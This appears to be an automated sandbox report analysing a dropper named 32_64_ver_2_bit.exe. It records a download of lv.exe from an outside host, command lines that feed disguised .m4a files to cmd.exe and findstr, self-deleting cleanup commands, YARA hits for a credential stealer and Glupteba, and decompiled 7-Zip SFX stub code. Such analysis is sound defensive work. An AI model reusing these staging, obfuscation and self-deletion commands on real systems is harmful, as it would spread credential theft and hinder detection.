Apr 6, 2021 13:59:50.171329975 CEST	5572	OUT	GET /download.php?file=lv.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: esmxc01.top Connection: Keep-Alive
Apr 6, 2021 13:59:50.214310884 CEST	5572	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 32_64_ver_2_bit.exe PID: 6512 Parent PID: 5720

General

Start time:	13:57:36
Start date:	06/04/2021
Path:	C:\Users\user\Desktop\32_64_ver_2_bit.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\32_64_ver_2_bit.exe'
Imagebase:	0x400000
File size:	1807502 bytes
MD5 hash:	010D7703A5D4CFEA5EA6E9CED6B42EFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: at.exe PID: 6648 Parent PID: 6512

General

Start time:	13:57:38
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\at.exe'
Imagebase:	0x1140000
File size:	25088 bytes
MD5 hash:	6E495479C0213E98C8141C75807AADC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 6656 Parent PID: 6648

General

Start time:	13:57:38
Start date:	06/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6704 Parent PID: 6512

General

Start time:	13:57:39
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Emergevano.m4a
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6712 Parent PID: 6704

General

Start time:	13:57:39
Start date:	06/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6752 Parent PID: 6704

General

Start time:	13:57:40
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\cmd.exe
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: findstr.exe PID: 6784 Parent PID: 6752

General

Start time:	13:57:42
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V /R '^rVXykbQqapJWWMDHyvEvyHNVAdBwZDWHZRqXvSSwIZqGLuAOebILYIqvoeEVVOqOheXtLGljECOuHulzQNZBUlIs$' Giudichera.m4a
Imagebase:	0x180000
File size:	29696 bytes
MD5 hash:	8B534A7FC0630DE41BB1F98C882C19EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: Male.exe.com PID: 6800 Parent PID: 6752

General

Start time:	13:57:43
Start date:	06/04/2021
Path:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
Wow64 process (32bit):	true
Commandline:	Male.exe.com p
Imagebase:	0x13b0000
File size:	943784 bytes
MD5 hash:	78BA0653A340BAC5FF152B21A83626CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: PING.EXE PID: 6824 Parent PID: 6752

General

Start time:	13:57:43
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 30
Imagebase:	0x1030000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Male.exe.com PID: 6844 Parent PID: 6800

General

Start time:	13:57:44
Start date:	06/04/2021
Path:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com p
Imagebase:	0x13b0000
File size:	943784 bytes
MD5 hash:	78BA0653A340BAC5FF152B21A83626CC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.486569188.00000000053EC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.485801496.000000000503F000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000003.268846531.0000000005030000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.486053378.0000000005129000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.486682219.00000000054D1000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Glupteba_1, Description: Yara detected Glupteba, Source: 0000000A.00000002.484520661.000000000407F000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5344 Parent PID: 6844

General

Start time:	13:59:51
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\sldDCZXdq & timeout 3 & del /f /q 'C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com'
Imagebase:	0xd40000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5348 Parent PID: 5344

General

Start time:	13:59:51
Start date:	06/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: timeout.exe PID: 5868 Parent PID: 5344

General

Start time:	13:59:52
Start date:	06/04/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 3
Imagebase:	0xb50000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 32_64_ver_2_bit.exe PID: 6512 Parent PID: 5720 32_64_ver_2_bit.exeCOMMON

Execution Graph

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	24.5%
Total number of Nodes:	1781
Total number of Limit Nodes:	47

Executed Functions

Function 00406128, Relevance: 193.6, APIs: 70, Strings: 40, Instructions: 1139
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E00406128(void* __edx) {
				void* __edi;
				void* __esi;
				signed int _t218;
				short* _t237;
				void* _t238;
				signed int _t239;
				signed int _t240;
				WCHAR* _t242;
				signed int _t243;
				signed int _t248;
				signed int _t251;
				signed int _t255;
				signed int _t256;
				signed int _t262;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t278;
				signed int _t281;
				signed short _t283;
				intOrPtr _t287;
				signed short* _t289;
				signed int _t292;
				signed int _t293;
				void* _t294;
				short* _t299;
				long _t315;
				signed int _t322;
				signed short* _t328;
				signed int _t336;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t346;
				signed int _t348;
				signed int _t350;
				signed int _t358;
				signed int _t360;
				signed int _t367;
				signed int _t383;
				short _t400;
				signed short* _t401;
				signed int _t402;
				intOrPtr _t406;
				intOrPtr _t409;
				signed int _t412;
				intOrPtr _t416;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t425;
				signed int _t429;
				signed int _t430;
				signed short _t431;
				signed int _t434;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed short _t445;
				void* _t446;
				void* _t452;
				signed int _t455;
				signed int _t456;
				intOrPtr _t484;
				intOrPtr _t492;
				signed int _t509;
				signed int _t510;
				intOrPtr _t546;
				intOrPtr _t558;
				void* _t573;
				signed int _t592;
				signed int _t594;
				signed char _t596;
				signed int _t598;
				signed int _t603;
				WCHAR* _t605;
				void* _t610;
				intOrPtr _t612;
				signed int _t614;
				signed int _t616;
				void* _t641;
				signed int _t647;
				intOrPtr _t650;
				intOrPtr _t658;
				intOrPtr _t660;
				intOrPtr _t665;
				intOrPtr _t666;
				void* _t676;
				signed int _t679;
				void* _t682;
				signed int _t684;
				signed int _t685;
				intOrPtr _t689;
				signed short* _t690;
				signed int _t696;
				signed int _t697;
				void* _t698;
				signed int _t701;
				signed int _t703;
				signed int _t704;
				WCHAR* _t705;
				unsigned int _t712;
				signed int _t714;
				void* _t720;
				void* _t722;
				void* _t723;
				void* _t725;
				void* _t728;

				_t626 = __edx;
				_t720 = _t722 - 0x68;
				_t723 = _t722 - 0x2d4;
				__imp__?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z(E00405B77, _t682, _t698, _t446);
				E0040391C(__edx); // executed
				 *(_t720 - 0x26c) = 0x114;
				if(GetVersionExW(_t720 - 0x26c) == 0 ||  *((intOrPtr*)(_t720 - 0x25c)) != 2) {
					L215:
					MessageBoxA(0, "Sorry, this program requires Microsoft Windows 2000 or later.", "7-Zip SFX", 0x10);
					_t218 = 0x14;
					goto L216;
				} else {
					_t731 =  *((intOrPtr*)(_t720 - 0x268)) - 5;
					if( *((intOrPtr*)(_t720 - 0x268)) < 5) {
						goto L215;
					}
					";!@InstallEnd@!" = 0x3b;
					";!@Install@!UTF-8!" = 0x3b;
					E00411B60(E00411B60(E00411B60(_t216, _t720 + 0x24), _t720 - 0x48), _t720 - 8); // executed
					E00405502(_t626); // executed
					E00411BE5(_t720 - 8, E0040310A(GetCommandLineW(), _t720 + 0x24));
					E00404666(_t720 - 8, _t682, _t731);
					_t684 =  *(_t720 - 8);
					E00405051(L"SfxVarModulePlatform", L"x86", _t731, 1);
					E00405051(L"SfxVarSystemPlatform", E00403FDD(_t731), _t731, 1);
					E00405051(L"SfxVarCmdLine0", GetCommandLineW(), _t731, 1);
					wsprintfW(E004042F3(_t720 + 0x24, _t230, 0x20), L"%d",  *0x41e730 & 0x0000ffff);
					_t725 = _t723 + 0xc;
					E004042D8(_t720 + 0x24);
					E00405051(L"SfxVarSystemLanguage",  *((intOrPtr*)(_t720 + 0x24)), _t731, 1);
					_t237 = E004057A2(_t684, L"sfxlang");
					if(_t237 == 0 ||  *_t237 != 0x3a) {
						L8:
						_t238 = E004057A2(_t684, L"sfxversion");
						_t736 = _t238;
						if(_t238 == 0) {
							_t239 = E004057A2(_t684, L"sfxwaitall");
							__eflags = _t239;
							if(_t239 == 0) {
								_t635 = L"sfxelevation";
								 *((char*)(_t720 + 0x67)) = 0;
								_t240 = E004057A2(_t684, L"sfxelevation");
								__eflags = _t240;
								if(_t240 != 0) {
									 *((char*)(_t720 + 0x67)) = 1;
									_t684 = _t240;
								}
								_t242 = E004042F3(0x41e844, _t635, 0x208); // executed
								_t243 = GetModuleFileNameW(0, _t242, 0x208);
								__eflags = _t243;
								if(_t243 != 0) {
									E004042D8(0x41e844);
									_t636 = L"sfxtest";
									_t701 = E004057A2(_t684, L"sfxtest");
									__eflags = _t701;
									if(_t701 == 0) {
										L66:
										E00411C48(0x41e794, 0x41e844);
										E00411C48(0x41e7ac, 0x41e844);
										_t248 = E004038FB(0x41e844, __eflags);
										__eflags = _t248;
										if(__eflags >= 0) {
											_t605 =  *0x41e794; // 0xbceb18
											 *0x41e798 = _t248;
											 *((short*)(_t248 + _t248 + _t605)) = 0;
											_t406 =  *0x41e844; // 0x45f1c80
											_t38 = _t406 + 2; // 0x41e846
											E00411BE5(0x41e7ac, _t248 + _t248 + _t38);
											_t409 =  *0x41e844; // 0x45f1c80
											_t40 = _t409 + 2; // 0x41e846
											E00411BE5(0x41e890, _t248 + _t248 + _t40);
											_t412 = E00411DFA(0x41e890, 0x2e);
											__eflags = _t412;
											if(_t412 > 0) {
												_t636 =  *0x41e890; // 0xbce7c8
												__eflags = 0;
												 *0x41e894 = _t412;
												 *((short*)(_t636 + _t412 * 2)) = 0;
											}
											E00411C48(0x41e85c, 0x41e890);
											_t610 = 4;
											E00411CA3(0x41e85c, E00403DC8(_t610));
											_t416 =  *0x41e890; // 0xbce7c8
											_t612 =  *0x41e85c; // 0xbcef60
											 *0x41e738 = _t416;
											 *0x41e760 = _t612;
											 *0x41e764 = _t416;
										}
										E00411BE5(0x41e850, E00403FDD(__eflags));
										_t452 = 0x41e7b8;
										_t251 = E0040130D(0x41e7b8, __eflags,  *0x41e844);
										__eflags = _t251;
										if(_t251 != 0) {
											E00405FEF(E00411743(_t251, _t720 + 0x58), 0x41e7a0);
											_t484 =  *0x41e7bc; // 0xbc25d8
											_t637 = 0; // executed
											_t255 = E00405401(_t484, 0, __eflags, _t720 + 0x58); // executed
											_t703 = _t255;
											__eflags = _t703;
											if(_t703 == 0) {
												__eflags =  *0x41e8d8;
												if( *0x41e8d8 != 0) {
													L84:
													__eflags =  *0x41e8d8 - 4;
													if( *0x41e8d8 == 4) {
														L119:
														_push( *((intOrPtr*)(_t720 + 0x58)));
														L004191B0();
														goto L10;
													}
													_t256 =  *0x41e148; // 0x1
													_t704 = 0x41e148;
													while(1) {
														__eflags = _t256;
														if(__eflags == 0) {
															break;
														}
														wsprintfW(_t720 - 0xa0, L"SfxString%d", _t256);
														_t725 = _t725 + 0xc;
														_t637 = E00403DC8( *_t704);
														E00405051(_t720 - 0xa0, _t259, __eflags, 0); // executed
														_t704 = _t704 + 0x10;
														__eflags = _t704;
														_t256 =  *_t704;
													}
													_t488 = _t452;
													E004054E3(_t452, _t637, _t684);
													_t262 = E00401765(__eflags);
													 *(_t720 + 0x10) = _t262;
													__eflags = _t262;
													if(_t262 != 0) {
														E00405811(_t488);
														_t705 = E00405041();
														__eflags = _t705;
														if(__eflags == 0) {
															L101:
															E00405FEF(E00401341(_t452, __eflags), 0x41e7a0);
															_t492 =  *0x41e7bc; // 0xbc25d8
															E00405401(_t492, 0, __eflags, 0); // executed
															E00405811(_t492);
															E004013A6();
															E00401765(__eflags);
															E00405811(_t452);
															__eflags =  *((char*)(_t720 + 0x67));
															if( *((char*)(_t720 + 0x67)) != 0) {
																L107:
																 *(_t720 + 0x3c) = 0;
																_t272 = E00405041();
																while(1) {
																	_t685 = _t272;
																	__eflags = _t685;
																	if(_t685 == 0) {
																		break;
																	}
																	E00411B84(_t720 + 0x40, _t685);
																	_t641 = 0x3d;
																	_t274 = E0041158D( *((intOrPtr*)(_t720 + 0x40)), _t641);
																	__eflags = _t274;
																	if(__eflags <= 0) {
																		_push( *((intOrPtr*)(_t720 + 0x40)));
																		L004191B0();
																		L113:
																		E00405E96(); // executed
																		__eflags =  *0x41e44c - 0xffffffff;
																		if( *0x41e44c == 0xffffffff) {
																			 *0x41e44c = 0;
																		}
																		__eflags =  *0x41e7cb; // 0x0
																		if(__eflags == 0) {
																			__eflags =  *0x41e7c9; // 0x0
																			if(__eflags != 0) {
																				 *0x41e44c =  *0x41e44c & 0xfffffeff;
																				__eflags =  *0x41e44c;
																			}
																			__imp__CoInitialize(0);
																			_t276 = E00405041();
																			__eflags = _t276;
																			if(_t276 != 0) {
																				E00411BE5(0x41e89c, _t276);
																				 *0x41e740 = 1;
																			}
																			E004055FF(0x41e89c);
																			_t278 = E00405041();
																			__eflags = _t278;
																			if(_t278 != 0) {
																				__imp___wtol(_t278);
																				 *0x41e780 = _t278;
																			}
																			__eflags =  *0x41e8e0; // 0x0
																			if(__eflags == 0) {
																				__eflags =  *0x41e8d8 - 3;
																				if(__eflags != 0) {
																					_t709 = 0x41aa3c;
																					E00405051(L"SfxVarApiPath", 0x41aa3c, __eflags, 0);
																					E00405E96();
																					_t281 = E00405041();
																					__eflags = _t281;
																					if(_t281 != 0) {
																						__eflags =  *0x41e7ca;
																						if( *0x41e7ca == 0) {
																							E00407474(0x41e868, 0);
																							_t665 =  *0x41e86c; // 0xbc24f0
																							E00405051(L"SfxVarApiPath", _t665, __eflags, 0);
																							E00405E96();
																							E00411B84(_t720 + 0x30, 0x41aa3c);
																							E00407474(0x41e868, _t665);
																							_t666 =  *0x41e86c; // 0xbc24f0
																							E0040235E(L"ExecuteOnLoad", _t666, 0x41aa3c, _t720 + 0x30, 0x41aa3c);
																							_push( *((intOrPtr*)(_t720 + 0x30)));
																							L004191B0();
																						}
																					}
																					E00408410(0x41e7f0);
																					while(1) {
																						_t283 = E00405041();
																						__eflags = _t283;
																						if(_t283 == 0) {
																							goto L142;
																						}
																						__eflags =  *0x41e7c9;
																						if( *0x41e7c9 != 0) {
																							goto L142;
																						}
																						_t558 =  *0x41e738; // 0xbce7c8
																						_t350 = E00408C28(_t558, _t283);
																						__eflags = _t350;
																						if(_t350 == 0) {
																							_push( *((intOrPtr*)(_t720 + 0x58)));
																							L004191B0();
																							L165:
																							_push(5);
																							goto L22;
																						}
																						_t283 = GetKeyState(0x10);
																						__eflags = 0x00008000 & _t283;
																						if((0x00008000 & _t283) != 0) {
																							 *0x41e7c8 = 0x101;
																						}
																						__eflags =  *0x41e8c0;
																						if( *0x41e8c0 != 0) {
																							 *0x41e44c =  *0x41e44c & 0xffffff7f;
																							__eflags =  *0x41e44c;
																						}
																						L142:
																						E00411B60(_t283, _t720 + 0x4c);
																						__eflags =  *0x41e7c8;
																						if( *0x41e7c8 == 0) {
																							L152:
																							__eflags =  *(_t720 + 0x50);
																							 *((char*)(_t720 + 0x14)) = 0;
																							if( *(_t720 + 0x50) == 0) {
																								_t339 = E00405041();
																								__eflags = _t339;
																								if(_t339 != 0) {
																									E00411BE5(_t720 + 0x4c, L"ExecuteFile");
																									 *((char*)(_t720 + 0x14)) = 1;
																								}
																								__eflags =  *(_t720 + 0x50);
																								if( *(_t720 + 0x50) == 0) {
																									_t340 = E00405041();
																									__eflags = _t340;
																									if(_t340 != 0) {
																										E00411BE5(_t720 + 0x4c, L"RunProgram");
																									}
																								}
																							}
																							__eflags =  *0x41e7c8;
																							if( *0x41e7c8 != 0) {
																								L168:
																								__eflags =  *0x41e8a0;
																								if(__eflags != 0) {
																									E00411BBA(_t720 + 0x18, 0x41e89c);
																									E004055FF(_t720 + 0x18);
																									__eflags =  *(_t720 + 0x1c);
																									if( *(_t720 + 0x1c) != 0) {
																										E00411C48(0x41e89c, _t720 + 0x18);
																									}
																									_push( *((intOrPtr*)(_t720 + 0x18)));
																									 *0x41e740 = 1;
																									L004191B0();
																								} else {
																									E00411C48(0x41e89c, E0040439D(L"7ZipSfx.%03x", __eflags));
																									_push( *((intOrPtr*)(_t720 - 0x14)));
																									L004191B0();
																									 *0x41e740 = 0;
																								}
																								_t287 =  *0x41e89c; // 0x45f7fb0
																								_t509 =  *0x41e8a0; // 0x29
																								_t162 = _t509 * 2; // 0x438000
																								_t647 =  *(_t287 + _t162 - 2) & 0x0000ffff;
																								__eflags = _t647 - 0x5c;
																								if(_t647 == 0x5c) {
																									L175:
																									_t510 = _t509 - 1;
																									__eflags = 0;
																									 *0x41e8a0 = _t510;
																									 *((short*)(_t287 + _t510 * 2)) = 0;
																									goto L176;
																								} else {
																									__eflags = _t647 - 0x2f;
																									if(_t647 != 0x2f) {
																										L176:
																										__eflags =  *0x41e7c9;
																										if( *0x41e7c9 != 0) {
																											 *0x41e774 =  *0x41e774 | 0x00000003;
																											__eflags =  *0x41e774;
																										}
																										E00411B84(_t720 - 0x20, L"PreExtract");
																										_t289 =  *0x41e7c4; // 0x41a648
																										E004015EC(_t720 - 0x20,  *_t289 & 0x0000ffff);
																										_t649 = 0;
																										_t292 = E00405041();
																										__eflags = _t292;
																										if(_t292 != 0) {
																											__eflags =  *0x41e7ca;
																											if( *0x41e7ca == 0) {
																												E00407474(0x41e868, 0);
																												_t658 =  *0x41e86c; // 0xbc24f0
																												E00405051(L"SfxVarApiPath", _t658, __eflags, 0);
																												E00405E96();
																												E00411B84(_t720 + 0x30, _t709);
																												_t328 =  *0x41e7c4; // 0x41a648
																												 *(_t720 - 0x24) = _t328;
																												E00407474(0x41e868, _t658);
																												_t649 =  *0x41e86c; // 0xbc24f0
																												E0040235E(L"PreExtract", _t649,  *(_t720 - 0x24), _t720 + 0x30, _t709);
																												_push( *((intOrPtr*)(_t720 + 0x30)));
																												L004191B0();
																											}
																										}
																										__eflags =  *0x41e8d4;
																										if(__eflags != 0) {
																											_t293 = E00408D16(_t649);
																											__eflags = _t293;
																											if(_t293 != 0) {
																												goto L187;
																											}
																											_t322 = 0x80004005;
																											goto L185;
																										} else {
																											_t322 = E00402D99(0x41e89c, _t649, __eflags); // executed
																											L185:
																											__eflags = _t322;
																											if(_t322 == 0) {
																												L187:
																												_t294 = E00405E96();
																												__eflags =  *0x41e7ca;
																												if( *0x41e7ca == 0) {
																													L189:
																													E00411B60(E00411B60(_t294, _t720 + 0x40), _t720 + 4);
																													__eflags =  *0x41e7c8;
																													if( *0x41e7c8 == 0) {
																														E00401BE9(_t720 + 0x40);
																													}
																													_t455 = 0;
																													__eflags =  *(_t720 + 0x50);
																													if( *(_t720 + 0x50) != 0) {
																														_t650 =  *0x41e89c; // 0x45f7fb0
																														E0040235E( *((intOrPtr*)(_t720 + 0x4c)), _t650,  *0x41e7c4, _t720 + 0x40,  *(_t720 + 0x10));
																														goto L197;
																													} else {
																														__eflags =  *0x41e740 - _t455; // 0x1
																														if(__eflags != 0) {
																															L197:
																															__eflags =  *0x41e8d8 - _t455; // 0x0
																															if(__eflags == 0) {
																																E00405E96();
																																E00405A8B(E00405EEB, L"Shortcut", __eflags,  *0x41e7c4, 0xffffffff);
																																SetCurrentDirectoryW( *0x41e794);
																																E00405A8B(E00405A61, L"Delete", __eflags,  *0x41e7c4, 0xffffffff);
																																E00405B62();
																															}
																															_push( *(_t720 + 4));
																															L004191B0();
																															_push( *((intOrPtr*)(_t720 + 0x40)));
																															L004191B0();
																															L201:
																															__eflags =  *0x41e458 - 0xffffffff;
																															if( *0x41e458 != 0xffffffff) {
																																L204:
																																__eflags =  *0x41e458 - _t455; // 0x1
																																if(__eflags > 0) {
																																	_t709 = E00405041();
																																	__eflags = _t709 - _t455;
																																	if(_t709 != _t455) {
																																		__eflags =  *0x41e458 - 0x3e7; // 0x1
																																		if(__eflags > 0) {
																																			 *0x41e458 = 0x3e7;
																																		}
																																		E004076D3(_t720 - 0x98, 0, __eflags);
																																		 *((intOrPtr*)(_t720 - 0x98)) = "G]@";
																																		 *((intOrPtr*)(_t720 - 0x60)) = 0x7d5;
																																		E00407734(E00407A45(_t720 - 0x98, 0x11,  *0x41e738, _t709, _t455), _t720 - 0x98);
																																	}
																																}
																																L209:
																																__eflags =  *0x41e7ca;
																																if( *0x41e7ca == 0) {
																																	__eflags =  *0x41e8d8 - _t455; // 0x0
																																	if(__eflags == 0) {
																																		_t299 = E00405041();
																																		__eflags = _t299 - _t455;
																																		if(_t299 != _t455) {
																																			__eflags =  *_t299 - 0x31;
																																			if( *_t299 == 0x31) {
																																				E00411BBA(_t725, 0x41e844);
																																				E00405B8E(_t709);
																																			}
																																		}
																																	}
																																}
																																_push( *((intOrPtr*)(_t720 - 0x20)));
																																L004191B0();
																																_push( *((intOrPtr*)(_t720 + 0x4c)));
																																L004191B0();
																																_push( *((intOrPtr*)(_t720 + 0x58)));
																																L004191B0();
																																_push( *(_t720 - 8));
																																L004191B0();
																																_push( *((intOrPtr*)(_t720 - 0x48)));
																																L004191B0();
																																_push( *((intOrPtr*)(_t720 + 0x24)));
																																L004191B0();
																																_t218 = 0;
																																goto L216;
																															}
																															__eflags =  *0x41e7c9;
																															if( *0x41e7c9 != 0) {
																																goto L209;
																															}
																															 *0x41e458 = 1;
																															goto L204;
																														}
																														_t709 = L"setup.exe";
																														_t656 = E00411B08(_t720 - 0x3c, 0x41e89c, "\\");
																														E00411BE5(_t720 + 4,  *((intOrPtr*)(E00411B08(_t720 - 0x14, _t312, L"setup.exe"))));
																														_push( *((intOrPtr*)(_t720 - 0x14)));
																														L004191B0();
																														_push( *((intOrPtr*)(_t720 - 0x3c)));
																														L004191B0();
																														_t315 = GetFileAttributesW( *(_t720 + 4));
																														__eflags = _t315 - 0xffffffff;
																														if(_t315 != 0xffffffff) {
																															_t689 =  *0x41e89c; // 0x45f7fb0
																															E00411B84(_t720 + 0x30, L"setup.exe");
																															E0040206F(_t720 + 0x30, _t689,  *((intOrPtr*)(_t720 + 0x14)), _t720 + 0x40,  *(_t720 + 0x10));
																															_push( *((intOrPtr*)(_t720 + 0x30)));
																															L004191B0();
																															goto L197;
																														}
																														E00405B62();
																														_push(0xf);
																														_push(0);
																														E0040976C(_t656);
																														_push( *(_t720 + 4));
																														L004191B0();
																														_push( *((intOrPtr*)(_t720 + 0x40)));
																														L004191B0();
																														_push( *((intOrPtr*)(_t720 - 0x20)));
																														L004191B0();
																														_push( *((intOrPtr*)(_t720 + 0x4c)));
																														L004191B0();
																														_push( *((intOrPtr*)(_t720 + 0x58)));
																														L004191B0();
																														_t725 = _t725 + 0x1c;
																														L35:
																														_push(7);
																														goto L22;
																													}
																												}
																												__eflags =  *0x41e740;
																												if( *0x41e740 != 0) {
																													_t455 = 0;
																													__eflags = 0;
																													goto L201;
																												}
																												goto L189;
																											}
																											E00405B62();
																											_push( *((intOrPtr*)(_t720 - 0x20)));
																											L004191B0();
																											_push( *((intOrPtr*)(_t720 + 0x4c)));
																											L004191B0();
																											_push( *((intOrPtr*)(_t720 + 0x58)));
																											L004191B0();
																											_t725 = _t725 + 0xc;
																											_push(8);
																											goto L22;
																										}
																									}
																									goto L175;
																								}
																							} else {
																								__eflags =  *0x41e7c9;
																								if( *0x41e7c9 != 0) {
																									goto L168;
																								}
																								_t336 =  *0x41e44c; // 0x0
																								__eflags = (_t336 & 0x000000c0) - 0x80;
																								if((_t336 & 0x000000c0) != 0x80) {
																									goto L168;
																								}
																								_t660 =  *0x41e748; // 0xbcbb48
																								_t546 =  *0x41e754; // 0xbcbb18
																								_t338 = E00408CC3(_t546, _t660);
																								__eflags = _t338;
																								if(_t338 != 0) {
																									goto L168;
																								}
																								_push( *((intOrPtr*)(_t720 + 0x4c)));
																								__eflags =  *0x41e784 - _t338; // 0x0
																								if(__eflags == 0) {
																									L004191B0();
																									_push( *((intOrPtr*)(_t720 + 0x58)));
																									L004191B0();
																									goto L165;
																								}
																								L004191B0();
																								continue;
																							}
																						}
																						_t690 =  *0x41e7c4; // 0x41a648
																						while(1) {
																							E00411BE5(_t720 + 0x4c, L"AutoInstall");
																							E004015EC(_t720 + 0x4c,  *_t690 & 0x0000ffff);
																							_t346 = E00405041();
																							__eflags = _t346;
																							if(_t346 == 0) {
																								break;
																							}
																							_t690 =  &(_t690[1]);
																							_t348 =  *_t690 & 0x0000ffff;
																							__eflags = _t348 - 0x30;
																							if(_t348 < 0x30) {
																								L147:
																								__eflags = _t348 - 0x61;
																								if(_t348 < 0x61) {
																									L149:
																									__eflags = _t348 - 0x41;
																									if(_t348 < 0x41) {
																										L151:
																										E00411BE5(_t720 + 0x4c, L"AutoInstall");
																										goto L152;
																									}
																									__eflags = _t348 - 0x5a;
